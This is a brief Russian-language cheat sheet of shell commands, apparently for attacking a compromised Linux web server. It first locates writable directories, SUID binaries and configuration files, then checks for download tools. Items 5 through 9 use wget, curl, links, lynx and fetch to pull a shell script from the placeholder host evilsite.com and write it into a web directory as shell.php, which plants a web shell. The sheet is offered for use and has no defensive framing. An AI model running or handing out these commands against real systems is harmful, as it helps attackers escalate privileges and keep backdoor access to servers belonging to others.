1. Поиск
директорий, доступных на запись,
относительно текущей
find . -perm -2 -type d -ls
2. Поиск файлов с
установленным SUID-битом
find / -type f -perm
-04000 -ls
3. Поиск конфигурационных
файлов
find / -type f -name "config*"
4. Поиск так называемых
качалок
which wget; which curl;
which lynx; which links; which
fetch
5. Качалка wget
wget http://evilsite.com/shell.txt
-O /home/user/www/shell.php
6. Качалка curl
curl http://evilsite.com/shell.txt
-o /home/user/www/shell.php
7. Качалка links
links -source http://evilsite.com/shell.txt
> /home/user/www/shell.php
8. Качалка lynx
lynx -source
http://evilsite.com/shell.txt >
/home/user/www/shell.php
9. Качалка fetch
fetch -o
http://evilsite.com/shell.txt -p
/home/user/www/shell.php
